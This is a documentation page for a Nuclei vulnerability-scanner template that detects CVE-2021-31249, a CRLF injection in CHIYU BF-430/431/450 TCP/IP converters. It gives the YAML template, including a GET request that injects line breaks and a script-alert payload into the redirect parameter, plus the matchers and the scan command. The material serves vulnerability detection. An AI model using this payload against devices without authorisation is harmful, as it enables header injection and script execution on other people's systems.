Skip to content
Nuclei Templates

CHIYU TCP/IP Converter - Carriage Return Line Feed Injection

ID: CVE-2021-31249

Severity: medium

Author: geeknik

Tags: cve2021,cve,chiyu,crlf,iot,chiyu-tech

Description

Section titled “Description”

CHIYU TCP/IP Converter BF-430, BF-431, and BF-450 are susceptible to carriage return line feed injection. The redirect= parameter, available on multiple CGI components, is not properly validated, thus enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

YAML Source

Section titled “YAML Source”
id: CVE-2021-31249


info:
  name: CHIYU TCP/IP Converter - Carriage Return Line Feed Injection
  author: geeknik
  severity: medium
  description: CHIYU TCP/IP Converter BF-430, BF-431, and BF-450 are susceptible to carriage return line feed injection. The redirect= parameter, available on multiple CGI components, is not properly validated, thus enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution, unauthorized access, or data manipulation.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the vulnerability.
  reference:
    - https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249
    - https://www.chiyu-tech.com/msg/message-Firmware-update-87.html
    - https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-31249
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2021-31249
    cwe-id: CWE-74
    epss-score: 0.00331
    epss-percentile: 0.68046
    cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: chiyu-tech
    product: bf-430_firmware
  tags: cve2021,cve,chiyu,crlf,iot,chiyu-tech


http:
  - method: GET
    path:
      - "{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY"


    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "Location: setting.htm"
          - "<script>alert(document.domain)</script>"
        condition: and


      - type: status
        status:
          - 302
# digest: 4b0a0048304602210080ba84a10128ce95b4a530158cd2fb55506dce26f08d94d411fcdfc989fcfa84022100e406719011d9cdc11d060e674dbc522641b415227771ae575162eebb4a599b97:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-31249.yaml"

View on Github